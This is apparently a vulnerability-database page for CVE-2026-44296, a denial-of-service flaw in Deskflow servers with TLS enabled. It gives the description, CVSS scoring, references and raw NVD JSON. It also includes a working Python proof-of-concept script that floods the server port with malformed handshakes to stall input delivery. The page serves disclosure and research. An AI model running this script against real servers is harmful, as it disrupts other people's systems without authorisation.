CVE-2026-44296

Description

Deskflow is a keyboard and mouse sharing app. Prior to 1.26.0.167, a remote, unauthenticated denial of service (DoS) vulnerability affects Deskflow servers running with TLS enabled (the default). When any TCP peer connects to the listening port and its first bytes do not parse as a valid TLS ClientHello, SecureSocket::secureAccept enters its fatal-error branch and calls Arch::sleep(1) (a blocking 1-second sleep) on the multiplexer worker thread. That thread services every socket on the server, including established TLS clients delivering mouse motion, keyboard events, and clipboard updates. A single failed handshake therefore stalls input delivery to all connected screens for ~1 second, and a sustained drip of malformed connections (≥ 1/s) makes the server effectively unusable while the attack persists. This vulnerability is fixed in 1.26.0.167.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Deskflow < 1.26.0.167

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

def dos_attack(target_ip, target_port, duration):
    """
    PoC for CVE-2026-44296
    Sends non-TLS bytes to trigger the blocking sleep in Deskflow.
    """
    end_time = time.time() + duration
    print(f"[*] Starting DoS attack on {target_ip}:{target_port} for {duration} seconds...")
    
    while time.time() < end_time:
        try:
            # Create a TCP socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            
            # Connect to the Deskflow server
            s.connect((target_ip, target_port))
            
            # Send invalid bytes (not a valid TLS ClientHello)
            # This triggers the fatal error branch in SecureSocket::secureAccept
            s.send(b"INVALID_TLS_DATA")
            
            # Close the connection immediately
            s.close()
            
            # Sleep slightly to align with the 1-second block or sustain the attack
            time.sleep(0.1)
            
        except Exception as e:
            print(f"[!] Error: {e}")
            time.sleep(0.1)

    print("[*] Attack finished.")

if __name__ == "__main__":
    # Example usage
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 24800
    DURATION = 60
    
    dos_attack(TARGET_IP, TARGET_PORT, DURATION)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44296
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44296
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44296/
[4] VulDB https://vuldb.com/cve/CVE-2026-44296
[5] https://github.com/deskflow/deskflow/commit/329783490bd16774ba903b84212467d20d76bfba
[6] https://github.com/deskflow/deskflow/security/advisories/GHSA-3mxm-cgh2-6448

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44296", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:36.707", "lastModified": "2026-05-12T22:16:36.707", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deskflow is a keyboard and mouse sharing app. Prior to 1.26.0.167, a remote, unauthenticated denial of service (DoS) vulnerability affects Deskflow servers running with TLS enabled (the default). When any TCP peer connects to the listening port and its first bytes do not parse as a valid TLS ClientHello, SecureSocket::secureAccept enters its fatal-error branch and calls Arch::sleep(1) (a blocking 1-second sleep) on the multiplexer worker thread. That thread services every socket on the server, including established TLS clients delivering mouse motion, keyboard events, and clipboard updates. A single failed handshake therefore stalls input delivery to all connected screens for ~1 second, and a sustained drip of malformed connections (≥ 1/s) makes the server effectively unusable while the attack persists. This vulnerability is fixed in 1.26.0.167."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-405"}]}], "references": [{"url": "https://github.com/deskflow/deskflow/commit/329783490bd16774ba903b84212467d20d76bfba", "source": "[email protected]"}, {"url": "https://github.com/deskflow/deskflow/security/advisories/GHSA-3mxm-cgh2-6448", "source": "[email protected]"}]}}